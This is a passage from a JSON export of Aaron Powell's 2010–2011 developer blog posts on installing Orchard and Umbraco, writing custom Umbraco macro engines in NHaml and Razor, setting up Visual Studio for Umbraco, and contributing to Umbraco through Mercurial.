For both products if it’s your first install, or you’re not someone who’s familiar with IIS I’d strongly recommend that you use Web PI, in fact it’s the recommended install process for both of them.\nWith both releases downloaded it’s time to get started on actually installing.\nConfiguring IIS For this I’m going to assume some basic IIS knowledge, and that you have Web Deploy already installed on your machine.\nThe first thing that you need to do is create an empty IIS web site for each project (Umbraco does run in virtual directory, and I’m sure Orchard does to, but I want to run them as stand alone applications, that’s how I would be using them in a production instance so it makes sense for me), I’ve created one called orchard-v1 and one called umbraco-461:\nNext you need to select one of the web sites (I’m starting with Orchard) and use Web Deploy to import the downloaded package.\nInstalling Orchard Once we kick off the Web Deploy install we get an overview of what Orchard is going to install, a nice simple overview:\nCool, it’s nice and simple, just two folders that it needs to access, App_Data and Media, that’s quite nice but I’m not sure what that means for plug ins (but that’s an issue for another day :P). Click next and we’ll work with the database which I can choose if I want to use an existing database or if we want to create a new one, or not have a database at all. I’m wanting to have the full experience, so I’m going to create a new database, this takes us to the next step which has a nice large set of options:\nNow I can configure all my settings, Orchard wants to install into a virtual directory, so I’ve blanked out the first property as I want it to be in the root of the web site I created in IIS. I put in my database information and click next.\nThis brings us to the end of the IIS install in which I receive a nice overview of what was just done.\nSweet, Orchard is installed, now let’s go onto Umbraco.\nInstalling Umbraco I start by selecting my Umbraco IIS web site, choosing to import from the downloaded package, and again we get an overview of what Umbraco is going to do:\nThe first thing I think is WOW, that’s a LOT of folders which Umbraco needs to configure permissions for! As an experienced Umbraco user I tend not to think twice about it, but someone new Umbraco might find this strange. The majority of these folders are required for the plugin support of Umbraco, and a bit of a by-product of there not being a ‘simpler’ plugin format (ie - a single folder where plugins would go). You can get away with changing many of those permissions later, but at the moment you have to accept it and move on :P.\nLike with the Orchard install Umbraco will ask if you want to do a database or not. Again I’m going to choose to install a new database just as I did with Orchard. And just like Orchard theres a set of fields to set the path (again I want it at the root so I clear that field), the database information, etc:\nSomething that’s interesting about this form as opposed to Orchard I was only asked to enter the database passwords once each, where as Orchard asks you to confirm the database user password (and the admin password if you’re created a new database too). There’s benefits to both and there’s annoyances to both so I wouldn’t say that either is my preferred solution. I’ll admit I didn’t try putting in non-matching passwords so I don’t know how Web Deploy would handle it vs a wrong password, but that’s something for someone else to try out (this post is going to be long enough, I don’t want to add every conditional branch into it).\nOnce I click next and Web Deploy finishes you get a similar summary as you get with Orchard (and which I wont bore you with the screen shot this time :P).\nAnd that’s it, we’re done with installing our sites. Now we’re going to configure our two web applications.\nConfiguring Orchard So I’ve fired up my browser and navigated to the Orchard site I just installed, first thing I’m given is an option to configure the site I just installed:\nHang on a sec, what’s the prompt about databases, I thought I did that as part of the Web Deploy process? I would have expected that to be setup, oh well let’s just select the settings again:\nHmm… not even the connection string information was set in there so I now have to manually enter a connection string, this is rather annoying as I’ve already gone through this with the Web Deploy process. At least the Orchard team have put in the information about what a connection string would look like that you can use as a template, because after all who remembers the format of a connection string without Google, sorry Bing :P.\nAnyway I filled out all my settings, clicked Finish and bang, my website is ready for work:\nFantastic! Let’s have a go at configuring our Umbraco install.\nConfiguring Umbraco If you’ve looked at Umbraco in the past you’ll probably know that it’s had a reputation as having an underwhelming install experience. It looked tired and wasn’t really representative of the product that Umbraco is today. Well good news this has been revamped in Umbraco Juno, and the installer is looking very sexy indeed.\nUmbraco first starts up with an overview of the installer steps that you’ll be going through:\nNext we’re presented with the license which Umbraco ships with (MIT if you’re not going to read the picture):\nI quite like this (from an open source standpoint), since it’s an open source project it’s good to know what the license is up front. Orchard too is open source, but you have concerns about using open source having the license thrust in your face gives you a final chance to bail out.\nOn a side note I wasn’t actually aware of what the Orchard license was, I didn’t see a direct link from the home page (it’s on the Mission Statement page though). It is quite prominent on the CodePlex site though, and it’s the New BSD license if you’re interested.\nOnce you accept the license you move onto the screen where you configure your database. Like Orchard it doesn’t seem to realise I did database setup steps already too, but unlike Orchard when I clicked ‘Yes I have a database’ the following form fields are already populated with my connection string information. Bit of a win on top of Orchard, I don’t have to put it in again (assuming you’re using MS SQL, I’m not sure what happens with the other database options). A nice side note on the database installer is that there are a few more options than with Orchard including MySQL, which I’m not sure if Orchard supports or not. This is obviously something to keep in mind for hosting provider choice too.\nMoving on I am asked to set my admin details:\nNow that I’ve finished configuring my user I finally get to the point of choosing some defaults for my site. This is new in Umbraco Juno (well it’s a revamp from what was previously available as starter kits):\nI’m going to use a blog, since the default Orchard install is a blog as well, and next I get to choose one of the default skin options:\nWe’re going with a basic theme which is similar to the one which is used by Orchard, again I’m trying to get the experience between the two as similar as I can.\nAnd now we’re finished, Umbraco gives us a finishing screen:\nFrom here you can launch into the back office or view the site that we’re just installed:\nAnd we’re done!\nConclusionTwo CMS products, two different install experiences. I quite like the simple experience which Orchard provides you with, a lot of the time that I’m working with a CMS I’m not interested in starter kits or anything, I already have a set of requirements to work with and they don’t match what comes with the starter kits.\nThat said though Orchard does install some basic content pages, and I don’t know how you install without them (there was no obvious option I came across) and this is a bit annoying as once it’s installed I have to go back and remove them anyway. It’d be nice if I could have a way in which you could install a completely blank Orchard instance (and if there is a way please let me know).\nUmbraco on the other hand has a rather involved configuration process, and it has a number of different starter kits which you can choose from, or you can choose to install a blank site (sorry my screenshot cut that option out). For me this is a much nicer option since often I’m wanting a blank CMS. That said the configuration experience is a bit more tedious as it’s quite verbose in the steps that you need to go through, which is both a pro and a con, it gives a lot of visibility, but if you’re an experienced user like myself you’ve seen it all a thousand times before.\nBoth products have really polished looking install experiences, and in my opinion both have pros and cons. I like the simple, no-fuss experience of Orchard, but I am bothered by the fact that it didn’t detect my database settings from the Web Deploy steps. Umbraco on the other hand did pick up the database information (to a certain extent) and has a much wider variety of starter kits for getting going, but it’s a lot longer a process.\n", "id": "2011-01-11-orchard-umbraco-installing" }, { "title": "NHaml Umbraco MacroEngine", "url": "https://www.aaron-powell.com/posts/2010-12-28-nhaml-umbraco-macroengine/", "date": "Tue, 28 Dec 2010 00:00:00 +0000", "tags": [ "umbraco" ], "description": "How to implement a fully functional custom Umbraco MacroEngine using NHaml language", "content": "In a previous post I introduced the new IMacroEngine interface coming as part of Umbraco Juno (4.6) which will make it possible to create your own Macro Engines. In this article I’ll look at what is required to create a custom Macro Engine which is actually useful.\nImplementing a Haml-based macro engine I’m quite a fan of Haml, it’s a good abstraction on top of HTML (well, XML really) and it’s quite popular if you’re doing Ruby work (it’s really popular in the Ruby community).\nA Haml file would look something like this:\n.content this is the text content of a page a{:href => "http://aaron-powell.com"} My Website And generates a snippet like this:\n<div class="content"> this is the text content of a page <a href="http://aaron-powell.com">My Website</a> </div> There’s a .NET port of Haml, NHaml, so let’s have a look at how we can implement a macro engine which allows us to use Haml as an Umbraco macro engine.\nI’ve started by grabbing the latest version of NHaml from their website, a copy of Umbraco Juno and fired up Visual Studio. I created a new .NET class library and added the following references:\nNHaml cms interfaces businesslogic Next I created my Macro Engine:\npublic class NHamlMacroEngine : IMacroEngine { public NHamlMacroEngine() { SupportedExtensions = new List<string> { "nhaml", "haml" }; } public bool Validate(string code, INode currentPage, out string errorMessage) { throw new NotImplementedException(); } public string Execute(MacroModel macro, INode currentPage) { throw new NotImplemented Exception } public string Name { get { return "Haml Macro Engine"; } } public List<string> SupportedExtensions { get; private set; } public Dictionary<string, IMacroGuiRendering> SupportedProperties { get { throw new NotImplementedException(); } } } With my macro engine I’m going to support files with a haml and nhaml extension (so existing templates can be used) and it’s specified in the constructor (you can set this as the return of the property but I don’t see the need to create the List each time the property is accessed ;)).\nImplementing macro execution The crux of what we have to build for a Macro Engine is in the Execute method. This method is nicely providing us with the macro itself and the current page (which all current macro engines provide to users), so how do we go about it?\nNow we’re going to delve into NHaml and what is actually required to execute our file.\nThe heavy lifting for most of our work will be done via the TemplateEngine class from NHaml, but I’m going to have a bit of a wrapper:\npublic class NHamlTemplateEngine : ITemplateContentProvider { public IList<string> PathSources { get; set; } public IViewSource GetViewSource(string templateName) { throw new NotImplementedException(); } public IViewSource GetViewSource(string templatePath, IList<IViewSource> parentViewSourceList) { throw new NotImplementedException(); } public void AddPathSource(string pathSource) { throw new NotImplementedException(); } } I’m going to ignore a lot of what this class does (partially cuz I couldn’t be bothered working out what it does :P), instead I’ll just be implementing the GetViewSource method:\npublic IViewSource GetViewSource(string templateName) { return new FileViewSource(new FileInfo(templateName)); } What we’re doing here is returning the standard OOTB IViewSource implementation, it’ll read the Haml file in from the file system and perform its black magic.\nThere’s currently no way which we can get the single string result back from the template to be used with the macro, so let’s work on that.\nFirst I’m going to be adding a new method to the NHamlTemplateEngine which will return a string from our template to give back to the macro engine:\npublic string Render(MacroModel macro, INode node) { var templateEngine = new TemplateEngine(); templateEngine.Options.TemplateContentProvider = this; CompiledTemplate res = templateEngine.Compile(IOHelper.MapPath(SystemDirectories.Python + "/" + macro.ScriptName)); using (var output = new StringWriter()) { var instance = res.CreateInstance(); instance.Render(output); return output.ToString(); } } Now we’ll finish off our IMacroEngine implementation by implementing the Execute method:\npublic string Execute(MacroModel macro, INode currentPage) { var engine = new NHamlTemplateEngine(); var output = engine.Render(macro, currentPage); return output; } Compile, drop the assembling into a Juno install and create a sample little Macro:\n%p some content here Add the macro to a page and booyeah, we are running our own template engine. You can now write Haml and output it within Umbraco.\nExtending our implementation Ok, so we’ve done our implementation, but it’s a bit limited, there’s two things which we aren’t really handling:\nHow do I access the currentPage in the macro? Can I use the new inline macro feature? Supporting inline macros This is a rather easy feature to support, the MacroModel which has been passed in has a property which we can access that, this comes through the ScriptCode property of the macro.\nBut wait, we’re passing in the phyisical template to NHaml, what are we going to do about that? Well I decided to do it a funky little way, we’ll actually generate the file(s) as needed for our inline macros:\npublic string Render(MacroModel macro, INode node) { var templateEngine = new TemplateEngine(); templateEngine.Options.TemplateContentProvider = this; CompiledTemplate res; if (string.IsNullOrEmpty(macro.ScriptCode)) { res = templateEngine.Compile(IOHelper.MapPath(SystemDirectories.Python + "/" + macro.ScriptName)); } else { var hash = GetMd5Hash(macro.ScriptCode); var path = IOHelper.MapPath(SystemDirectories.Data + "/" + hash + ".haml"); if (!File.Exists(path)) { using (var writer = new StreamWriter(path)) { writer.Write(macro.ScriptCode); } } res = templateEngine.Compile(path); } using (var output = new StringWriter()) { var instance = res.CreateInstance(); instance.Render(output); return output.ToString(); } } This is adding basic caching into the templates, so it generates a MD5 hash from the code to use as a filename, if it exists in the ‘data’ folder (ie - App_Data) it’ll be used, otherwise a new file is created from it. Now we’ve got a real file which we can pass into the NHaml engine.\nThat’s it, now we’ve got support for:\n<umbraco:Macro runat="server" Language="haml"> .class woo, content! </umbraco:Macro> Supporting currentPage Next on the check list of what our NHaml macro engine requires is the ability to access the currentPage object, and this is a bit trickier. Because Haml is just a markup layer it doesn’t know anything about Umbraco, nor does it know anything about the data that exists. For this we’ve got to create our own Template class which NHaml will use when executing the Haml file.\nFirst off I’m going to do some refactoring to move the NHaml template engine creation into the constructor of our engine:\nprivate readonly TemplateEngine _templateEngine; internal NHamlTemplateEngine() { _templateEngine = new TemplateEngine(); _templateEngine.Options.TemplateContentProvider = this; _templateEngine.Options.TemplateBaseType = typeof(NHamlTemplate); } This is more of a .NET preference of mine to have stuff such as this to be done in the constructor of the object, what you’ll notice is the new line:\n_templateEngine.Options.TemplateBaseType = typeof(NHamlTemplate); This is for our new template class which will have the currentPage object on it:\npublic class NHamlTemplate : Template { public INode currentPage { get; set; } } It’s a pretty simple class which we’ve implemented, and we’ve got a single property on there which we have to set, easy, we just have to update the Render method:\nusing (var output = new StringWriter()) { var instance = (NHamlTemplate)res.CreateInstance(); instance.currentPage = node; instance.Render(output); return output.ToString(); } When we create an instance of our template from the file we can cast it to the custom template class and then assign the property to the actual node for the current page.\nNow we can create a template like this:\n.content #{currentPage.GetProperty("bodyText").Value} But if you run this we’ve got an error, NHaml doesn’t know what the INode object is! We need to pass in the assembly to the NHaml engine, so let’s update the constructor:\ninternal NHamlTemplateEngine() { _templateEngine = new TemplateEngine(); _templateEngine.Options.AddReference(typeof(INode).Assembly); _templateEngine.Options.TemplateContentProvider = this; _templateEngine.Options.TemplateBaseType = typeof(NHamlTemplate); } Conclusion So there we go, we’ve got a custom macro engine which runs NHaml and allow you to work against Umbraco data.\nI’ve also pushed the code up to bitbucket too so you can grab a copy of it if you want to see it working.\n", "id": "2010-12-28-nhaml-umbraco-macroengine" }, { "title": "Custom Umbraco Macro Engines", "url": "https://www.aaron-powell.com/posts/2010-12-27-custom-umbraco-macro-engines/", "date": "Mon, 27 Dec 2010 00:00:00 +0000", "tags": [ "umbraco" ], "description": "A quick look at the new abstraction layer on top of the Umbraco Macro Engine in Umbraco Juno", "content": "A new feature coming in Umbraco Juno (4.6) is something that is probably a bit surprising for most people that it has come in after so long, an abstracted macro engine.\nWhat this means is that no longer is there just XSLT, .NET controls, IronRuby, IronPython and Razor, but you’ll be able to write your own macro engine if you want.\nIn this article we’ll look at how to create a new macro engine.\nWhere do you start? Like with a lot of extensibility points in Umbraco it’s actually really quite simple to do what you need, and creating a custom macro engine is no exception, all you have to do is implement a single interface, IMacroEngine from within the cms assembly.\nOn this interface there are only three sections that you need to implement for most operations, the name of it, the extensions it supports and its execution method.\nHere’s a really basic macro engine:\npublic class MyAwesomeMacroEngine : IMacroEngine { public bool Validate(string code, INode currentPage, out string errorMessage) { throw new NotImplementedException(); } public string Execute(MacroModel macro, INode currentPage) { return "Go go awesome macro engine!"; } public string Name { get { return "This is my awesome Macro Engine"; } } public List<string> SupportedExtensions { get { return new List<string> { "awesome" }; } } public Dictionary<string, IMacroGuiRendering> SupportedProperties { get { throw new NotImplementedException(); } } } Now when you go to create a new Script File in the Umbraco admin you’ll have a new option for your own macro engine.\nFurther reading I’ve created a supplementary post to this one which looks at how to create a NHaml based macro engine.\nConclusion Seriously, it’s just that easy to create your own macro engine, obviously you’ll want to do more with the Execute method so that it will interact with the script file that you’ve created, but this should give you a bit of a starting point :).\n", "id": "2010-12-27-custom-umbraco-macro-engines" }, { "title": "2010, a year in review", "url": "https://www.aaron-powell.com/posts/2010-12-24-2010-a-year-in-review/", "date": "Fri, 24 Dec 2010 00:00:00 +0000", "tags": [ "year-review" ], "description": "A look back at what was 2010", "content": "Well it’s about that time of the year, the time when you look back at the year that was… and what a year 2010 has been.\nLast year I said that 2009 was my biggest year professionally, but in reality 2010 trumped it well and truly.\n2010, the year of the conference In 2010 I set a new goal for myself and that was to become more of a figure in the Australian development community, and I started this off with a dive into the conference circuit.\nI…\nKicked off with DDD Melbourne where I presented a Beginning Umbraco session I then headed back to Melbourne for Remix (which I just attended :P) Flew to Denmark for CodeGarden 10 to speak about unit testing Returned to Sydney to help organize (and speak at) the first DDD Sydney conference Spoke about Umbraco in the CMS Smackdown for SBTUG Won Amped and went to Tokyo for Web Directions East Spoke about open source content management at CodeCamp OZ Talked about Open Conference Protocol at the Sydney Architecture User Group And wrapped up the year with a lightning talk at SydJs on JavaScript frameworks. Phew, busy conference set, wonder if I can top that next year :P.\nAnother year, another job Last year I was excited about taking a new job with TheFARM Digital and getting to work with Shannon so we could really go crazy with Umbraco development. Well there was some sadness when I announced that I was to be leaving TheFARM to join Readify.\nOpen Source work I spent a lot of time this year working on Open Source projects. Obviously Umbraco has featured highly in this area, with version 5 underway (and helping with the team migrate to Mercurial) a lot of my time was devoted there.\nBut I’ve also worked on a few other smaller projects:\nFunnelWeb A blogging engine targeted at real developers JavaScript tools Ole Slidee WhatKey.Net Examine LINQ to Umbraco Extensions I’ll update this soon :P Dynamic extensions Open Conference Protocol Nice little list I think ;)\nWell that pretty much concludes my 2010 wrap up, in 2011 be sure to look out for me at MIX 11, DDD Sydney and CodeGarden 11 :D\n", "id": "2010-12-24-2010-a-year-in-review" }, { "title": "Using Razor in Umbraco 4", "url": "https://www.aaron-powell.com/posts/2010-12-24-umbraco-4-and-razor/", "date": "Fri, 24 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "razor" ], "description": "A quick look at how to use the Razor support which is coming with Umbraco Juno (4.6)", "content": "If you’ve been following the development of Umbraco Juno (4.6) you’ll have seen that Niels released an add-in for early Juno builds to which was for working with Razor, the new syntax for ASP.Net development.\nWell here’s something even more exciting, Umbraco Juno no longer requires an add-in, instead it has a out-of-the-box support for working with Razor!\nAWESOME!\nUmbraco <3 Razor So what does the Razor support for Umbraco include? Well basically it allows Razor to be used in the same way that you use the Iron* languages, XSLT or .NET controls… as a macro. This means that you can use Razor just as you would any other language option.\nWorking with Razor in Umbraco So if you want to work with Razor what do you need to do? Well creating a Razor macro is just as nice as if you’re doing any other kind of macro, through the Umbraco UI.\nRazor files live along side the Iron* files in the /python folder (yeah, that’s a hold over from the original DLR engine and changing it would be a breaking change so we have to live with it. Note - as Morten pointed out in the comments you can set <add key="umbracoPythonPath" value="~/Razor" /> and use a different path for script files), and you create them like you create any other DLR script file in the Umbraco back office:\n(Yes there’s a spelling error in the beta which I’ve fixed :P)\nNow you can start coding up your Razor macros.\nMy first Razor macro With Razor macros there’s a slightly different way that you go about it, rather than using currentPage as you would with XSLT or an Iron* script you have a Model property which you work with.\nTo make this a bit nicer as well the Model property is a dynamic object, allowing you to access the properties as if they were actually properties of the model, meaning you can do this following:\n<div id="content">@Model.bodyText</div> That’s how easy it is to access the properties of the Model, no more getProperty("bodyText").Value. And there you have it, a basic Razor macro has been created.\nSomething a bit more advanced Well lets take it up a notch and make a slightly more advanced macro, say a news listing:\n<div class="news-lissting"> @foreach(var page in Model.Children) { <div class="news-item"> <h2><a href="@page.Url" title="@page.Name">@page.Name</a></h2> <h3>Published: @page.articleDate.ToString("dd MMM yyyy")</h3> <p>@page.description<p> </div> } </div> What we’re doing here looping through each of the children of the current page (the Model), and generating a <div> and then creating the HTML structure inside it.\nPost-beta features Just a little note I’ve added a change to the DynamicNode class which is used by the dynamic Model object that allows you to access specific types of children, so you can do this in your Razor file:\n<div class="news-lissting"> @foreach(var page in Model.articles) { <div class="news-item"> <h2><a href="@page.Url" title="@page.Name">@page.Name</a></h2> <h3>Published: @page.articleDate.ToString("dd MMM yyyy")</h3> <p>@page.description<p> </div> } </div> In this example my Model has children of the type article (that’s the alias of the DocType) and I’m requesting them all (hence the pluralization). Pretty sweet I think!\nConclusion I’m sure that even the most seasoned XSLT “developer” (I’m looking at you Warren!) will have to admit the Razor syntax is highly readable for people who aren’t .NET developers. And because we’re working with a dynamic object it’s really simple to access the properties as needed.\nThis brings us to the end of our quick look at the Razor support which is coming in Umbraco Juno, and how it’s going to be another great choice for developers.\n", "id": "2010-12-24-umbraco-4-and-razor" }, { "title": "How I develop Umbraco", "url": "https://www.aaron-powell.com/posts/2010-12-22-how-i-developer-umbraco/", "date": "Wed, 22 Dec 2010 00:00:00 +0000", "tags": [ "umbraco" ], "description": "How I do my development of Umbraco web applications.", "content": "Overview In this article I’m going to cover the way that I setup my system for developing against Umbraco. I’m putting this together as everyone seems to have their own flavor to doing development so I thought I’d throw my hat into the arena with yet another setup to give new (and experienced) developers another way to go about it.\nAnd hey, this has worked quite well for me for a while, maybe other can benefit from it ;).\nEnvironment So for this I’m going to be running the following software:\nVisual Studio 2010 I use Cassini as a development database, not IIS. I don’t use IIS as it requires (under Vista and 7) that you use an admin account to debug. Since my day-to-day Windows account isn’t an admin (seriously, you don’t need an admin for day-to-day work!) Cassini makes a lot more sense SQL Server Express Although I’m running Windows 7 I’ve used this setup on Windows XP and Vista as well, so don’t fear if you’re running an archaic OS :P.\nSide note: I’m using the Umbraco Juno (4.6) beta release, but again this is a moot point, it works with any Umbraco 4.x instance\nGetting Umbraco running So once you’ve downloaded Umbraco and extracted it fire up Visual Studio. First thing I do is create a blank Visual Studio project\nFor development I use Web Application projects, so create a new empty Web Application (ensuring you’ve got the right version of .NET selected too ;)) using the naming schema of SolutionName.Web:\nOnce I’ve added a Web Application I create the solutions required for WebFormsMVP projects, a Logic and Services project (which I then remove the Class1.cs file) and a Test project (omitted from here as it’s not important to the overall post). This will end you up with an empty Visual Studio solution (well, except for a web.config file):\nNow we have to copy all the files, except for the /bin folder, into Visual Studio:\nThere’s already a web.config in the project, so we’ll just replace it with the one that Umbraco supplied us, otherwise we wont have any of the config settings for Umbraco wont work, and we don’t want that.\nNow that Visual Studio is looking nicely filled out I exclude the following folders from the solution:\ndata install media umbraco umbraco_client I also delete the App_Code folder.\nThere is method to this madness, I copy them across so I can ensure that they are in my project folder when I add it to source control. But the reason that I exclude it is so that Visual Studio wont include them in the JIT compilation when you fire up the debugger. This is most important with the /umbraco folder, as that contains ASP.Net files, the other folders (data, media, etc) don’t contain files that I want in source control, so that’s why I don’t need them in Visual Studio.\nNow the Solution Explorer looks a bit more useful:\nIt’s almost done, there’s just 1 more problem, we need to handle the Umbraco assemblies. As you’ll remember we excluded that from being copied into Visual Studio. This is because the assemblies are a dynamic feature, so including them into the project directly is a bad idea, also, the /bin folder should never be included in source control!\nSo I close off Visual Studio so I can do some restructuring in Windows, basically I want the following structure in source control:\n/src /UmbracoDemo3.* (where the projects resides) /UmbracoDemo3.sln /lib /umbraco-4.6 Now I copy across all the assemblies into the umbraco-4.6 folder, then upon reopening Visual Studio I add the assemblies as references into the Web project. Now when the project is compiled it will then copy all the assemblies into the local /bin for the web application. I recommend deleting the App_Global.asax.dll (and the reference to it) as it just becomes a royal pain in the ass when working with WebFormsMVP.\nAny external assemblies which I need to include as a reference to a project that can’t be obtained via NuGet I’ll also put into there.\nNote: You don’t have to reference all of them, there is a subset of assemblies which you need to add and they will pull in the rest but I’ve never really sat down and worked out what ones they are.\nDone, now you can spin up Cassini and then you’re good to install Umbraco and start developing.\nConclusion So that brings us to a finale of how I go about doing Umbraco setup with Visual Studio. Here’s a few notices of things which I didn’t cover in this article but can be useful to know:\nI share databases, since the CI process of Umbraco isn’t exactly great it’s simpler to use a shared database for development I use Visual Studio for pretty much all file editing (css, masterpages, IronRuby, etc), but I create them through the Umbraco UI as it will set up the database records nicely ", "id": "2010-12-22-how-i-developer-umbraco" }, { "title": "SydJs talk about JavaScript Frameworks", "url": "https://www.aaron-powell.com/posts/2010-12-20-sydjs-javascript-frameworks/", "date": "Mon, 20 Dec 2010 00:00:00 +0000", "tags": [ "javascript", "sydjs" ], "description": "Talk given at SydJs on building JavaScript frameworks", "content": "Recently I was invited by the lovely (? :P) people of SydJs to come down as participate in their lightning talks night. I presented on the topic of JavaScript frameworks (although to this day I’m not really sure what my session title was as Craig Sharkie introduced it as something rather random).\nThe basic point of my talk was just to give some pointers to people who are looking to create reusable JavaScript components, resulting in me converting some JavaScript which what running my slides into a small library which anyone can use (links below).\nAll in all I really enjoyed being there, it was my first time down there (not only at SydJs but at a non-.NET user group, the enemy is a bit scary :P) and hopefully they will allow me back in the door in the future!\nHere’s the obligatory links set from the talk:\nSlides Slidee (which was running the slides in the browser) WhatKey.net (source, launch blog) My JavaScript tools (contains the namespace method, mocking frameworks, etc) LINQ in JavaScript ", "id": "2010-12-20-sydjs-javascript-frameworks" }, { "title": "Umbraco & Mercurial - How to contribute", "url": "https://www.aaron-powell.com/posts/2010-12-13-umbraco-and-mercurial-how-to-contribute/", "date": "Mon, 13 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "mercurial" ], "description": "A quick guide on how to contribute to Umbraco using Mercurial", "content": "Umbraco & Mercurial - How to contributeNow that Umbraco’s source code is being moved away from TFS and into Mercurial (and you’ve read the primer) it will be easier than ever for anyone to provide patches, bug fixes or even potential new features back to the Umbraco core team for review. Although you haven’t had to have TFS access in the past to get the code out and work with it the SVN bridge wasn’t a great way in which you could send patches back to the Umbraco core team, but with Mercurial we hope this will be even easier.\nGet Forked! Something that is very different in the world of DVCS is the idea of forks. Essentially a fork is a copy of the repository which someone has created for their own needs. A fork contains a full copy of the source repository but is completely isolated so what you do in your fork is your business, and a fork doesn’t have to be pushed back into the main repository, you may have a fork which you just want to have a small change for your own site needs.\nLet’s assume you found a bug in Umbraco and you want to fix it, here’s what to do:\nYou need to create a fork, so navigate to http://umbraco.codeplex.com/SourceControl/list/changesets and click the Create Fork option Enter a name for the fork and a description and click Save Now you’re done, you have your own copy of the repository which you can clone and edit to your hearts content. Also, this repository is stored on the CodePlex servers, meaning that you’ve now got your own online repository, so your changes can be pushed to CodePlex and accessed anywhere, no more worrying about what’ll happen when your laptop blows up and your personalized version of the Umbraco source code is lost.\nWorking with your fork Note: The following will use the Mercurial command line tools, you can use TortoiseHg if you prefer though, refer to the TortoiseHg doco for the UI interactions :).\nNow that you’ve created your fork, let’s set to work on fixing that bug. To do this we need to do the following steps, clone our fork, update to the right codebase and start working:\nhg cl <url of your fork> hg up Release-4.5.2 (or what ever revision you want to use) Launch Visual Studio That’ it, you’re now working in your own personalized copy of the Umbraco repository.\nMercurial commands to know Just to interrupt I’ll jump in and add a few more commands to your Mercurial toolbox:\nhg addremove (addr) This will add any files to the repository which weren’t previously included and remove any that it can’t find (but thinks it should). You can also us hg add and specify the file(s) explicitly too hg commit (com) This will commit any outstanding changes to your local repository (There’s some useful links from the Umbraco blog for understanding DVCSs) hg push (pus) This will send all change sets since you last pushed up to CodePlex hg status (sta) This lists all the files which have some kind of change, either added, removed, modified or unknown (new files not listed for add) since the last commit hg outgoing (o) Lists all the change sets which will be pushed to CodePlex the next time you do a push hg incoming (inc) Lists all the change sets which will be downloaded when you do a pull hg merge (me) Merges the last change set committed into the local repository with the last change set from the remote repository (generally run after a hg pul). You can merge to a specific change set by adding the -r flag Back to our original programming\nNow that you’ve fixed the bug, what do you do? Well we need to ensure that your code gets back to the core, for that we need to ensure that all files are included in the repository (if you added or removed any), the code is committed and you’ve sent it back to codeplex:\nhg addr hg com -m “Fixing bug #1234. The problem was caused by XYZ so I did ABC and have tested it on my machine under the circumstances outlined in the bug” If you get an error here about your username see below Make sure that you’re providing a useful commit message, fixed is not a useful commit message ;) hg pus You’ll probably have to supply your password at this point You can configure Mercurial to remember your password, I’ll get to that shortly Congratulations, you’ve just done a change and pushed it up to CodePlex! This change resides only in your fork at the moment though (this is what i meant by you can do forks which are just for your own needs that are never sent to the core), but you want to see this bug fixed in the core, so what’s next? Well you need to send the core team a pull request. To do this you need to go back to CodePlex and view your forks. On this screen there is a Send Pull Request link, click it, provide some information about why you’re sending the pull request and you’re done.\nHopefully this process is a lot simpler for people to provide changed to Umbraco than the previous patching system :).\nTroubleshoot and advanced tips In an ideal world everything will go as smoothly as outlined, but we don’t live in an ideal world, so let’s have a look at some other things which you may need to know.\nI get an error when committing about my username not being set If this is your first time using Mercurial chances are you haven’t got the environment 100% configured to do changes. One thing that is required when you do a change is that you provide a username (remember, this isn’t integrated with Windows so it wont grab that one). But don’t worry, it’s a very easy problem to fix.\nManually supplying usernames\nWhen you execute a hg com command you can specify the username there, like so: hg com -m "some commit message" -u 'Aaron Powell'.\nSetting a default username for the clone\nIf you’re doing a lot of commits you may want to set the username for this particular repository, to do so navigate into your .hg folder (in the root of the clone) and open the hgrc file (or create it if it doesn’t exist), and add the following section:\n[ui] username = "Aaron Powell" Save the file and now when you do hg com -m "some commit message" the username will be pulled from that file automagically!\nSetting a global username for Windows\nIf you’re using a lot of Mercurial clones you may not want to have to specify your username each time, instead you want something set globally for all of them. To do this you need to edit your global hgrc file. You need to add the section listed above to the global file, which the locations of it listed here: http://www.selenic.com/mercurial/hgrc.5.html.\nStoring your password Each time you push you need to authenticate against the CodePlex servers, but if you’re doing a lot of pushes then it may get annoying to have to type in your password each time (or if you’re like me and don’t know your password it’s even more of a pain!). Luckily it’s easy to have your password automatically included. Navigate into you .hg folder and open the hgrc file. You should have a section like this:\n[paths] default = http://../ This is the URL of your repository, and here you can configure it to automatically include your username & password, change the URL to be like this:\nhttps://username:password@ur.of.my.repository Save the file and now each time you commit your credentials are included :).\nStaying in sync with the core If you’re a really awesome dude who fixes a lot of bugs for us you may find that your fork gets out of sync with the core, but don’t fear, you can keep your fork in sync by pulling from multiple sources. What this allows you to do is define multiple repositories which you want to be able to get updates from (selectively).\nOpen your trusty hgrc file and navigate to the [paths] section. In here you can add multiple paths, each with a different name. Most likely your fork will be labeled default, so we’ll add a new one which is the core:\n[paths] default = https://hg01.codeplex.com/forks/slace/my-repository core = https://hg01.codeplex.com/umbraco Now when you do a pull you can specify where you want to pull from:\nhg pull core This will get all the latest change sets form the Umbraco core repository. You can then merge (hg me) them into your local fork and patch against it again!\nConclusion Here we’ve looked at how the move to Mercurial for Umbraco will make life easier for people outside of the Umbraco core team that want to contribute back. Hopefully this more streamlined process will mean that we see more fixes from the community so we can create even better a product :).\n", "id": "2010-12-13-umbraco-and-mercurial-how-to-contribute" }, { "title": "Mercurial 101 as an Umbraco developer", "url": "https://www.aaron-powell.com/posts/2010-12-11-mercurial-101-for-umbraco-developers/", "date": "Sat, 11 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "mercurial" ], "description": "A Mercurial primer for Umbraco developers", "content": "Mercurial 101 as an Umbraco developerYou may have read the post that the Umbraco codebase is being moved from a CodePlex TFS server to CodePlex Mercurial (link) but what does that mean as an Umbraco community member?\nFirst up, a Mercurial primer While there are fancy GUI tools for working with Mercurial (such as TortoiseHg) I’m going to do a quick run down on what you need to be able to use from the command line to work with Mercurial. Personally I find it easier (and quicker) to work on the command line, but if you’d prefer to learn about TortoiseHg jump over to their doco, or read Shannon’s guide to using TortoiseHg :).\nCommands you need There are three things you need to be able to do if you’re grabbing the code from Mercurial, clone, update and view history: (Note: This is not covering doing changes, just how to get the code and navigate around it)\nhg clone https://hg01.codeplex.com/umbraco This how you get a copy of the codeplex repository onto your machine. This may take a little while, we’ve got a lot of history (sic) in there that you’ll be getting hg update This is how you’ll get to the release that you want to view the code for. Say you want to work with v4.5.2 then you want to do hg update Release-4.5.2 hg serve This is an interesting command as it’ll spin up a webserver (http://localhost:8000 by default) which allows you to view the repository history. You can hit the url in your browser and browse change sets, 